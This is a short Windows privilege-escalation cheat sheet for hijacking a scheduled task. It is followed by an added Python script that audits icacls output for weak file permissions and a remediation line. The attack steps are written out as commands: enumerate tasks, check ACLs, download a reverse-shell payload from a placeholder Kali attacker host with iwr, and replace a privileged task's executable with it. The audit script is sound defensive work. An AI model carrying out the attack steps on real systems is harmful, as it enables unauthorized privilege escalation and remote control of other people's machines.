Scheduled Tasks

1. Get a list of scheduled tasks

schtasks /query /fo LIST /v
dir C:\Windows\System32\Tasks\

2. Identify a task that runs as a higher-privileged user

3. Check the application's file permissions

icacls "<Application Full Path>"

4. Craft a payload that returns a reverse shell

5. Download the payload onto the target machine

iwr -Uri http://<Kali IP Address>/<Payload File Name> -Outfile <Application File Name>

6. Store the original application file in the current directory

move <Application File Full Path> ./<Application File Name>.bak

7. Move the payload into the application file's location

move <Application File Name> <Application File Full Path>
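
For auditing the condition this procedure depends on (step 3), here is an added example, not part of the original page, that parses `icacls` output for a task's executable and lists the allow ACEs giving broadly held groups write access. The path, the sample output and the set of low-privileged principals are constructed assumptions.

```python
import re

# Principals every unprivileged local user belongs to (assumed audit scope).
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# icacls rights that allow replacing the file or rewriting its ACL/owner.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DE", "WDAC", "WO", "GA", "GW"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([^)]*\))+)$")

# Constructed sample of `icacls` output for a hypothetical task binary.
SAMPLE_PATH = r"C:\Program Files\Acme\backup.exe"
SAMPLE_OUTPUT = r"""C:\Program Files\Acme\backup.exe BUILTIN\Users:(I)(M)
                                 NT AUTHORITY\SYSTEM:(I)(F)
                                 BUILTIN\Administrators:(I)(F)
                                 Everyone:(RX,W)

Successfully processed 1 files; Failed processing 0 files"""


def parse_icacls(path, output):
    """Return (principal, is_deny, rights) for each ACE printed for path."""
    aces = []
    for line in output.splitlines():
        if line.lower().startswith(path.lower()):
            line = line[len(path):]  # the first ACE shares a line with the path
        m = ACE_RE.match(line.strip())
        if not m:
            continue  # blank line or the "Successfully processed" summary
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        rights = set()
        for g in groups:
            if g not in INHERIT_FLAGS and g != "DENY":
                rights.update(r.strip() for r in g.split(","))
        aces.append((m.group("who"), "DENY" in groups, rights))
    return aces


def weak_aces(path, output):
    """Allow ACEs that let a low-privileged principal modify the file."""
    # Deny ACEs are skipped, not resolved against allows: confirm each hit.
    return [(who, sorted(rights & WRITE_RIGHTS))
            for who, is_deny, rights in parse_icacls(path, output)
            if not is_deny and who.lower() in LOW_PRIV and rights & WRITE_RIGHTS]


if __name__ == "__main__":
    for who, rights in weak_aces(SAMPLE_PATH, SAMPLE_OUTPUT):
        print(f"{SAMPLE_PATH}: {who} has {','.join(rights)}")
```

A hit on a binary launched by a task that runs as SYSTEM or an administrator means the file's ACL should be tightened so that only administrators and SYSTEM can modify it.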
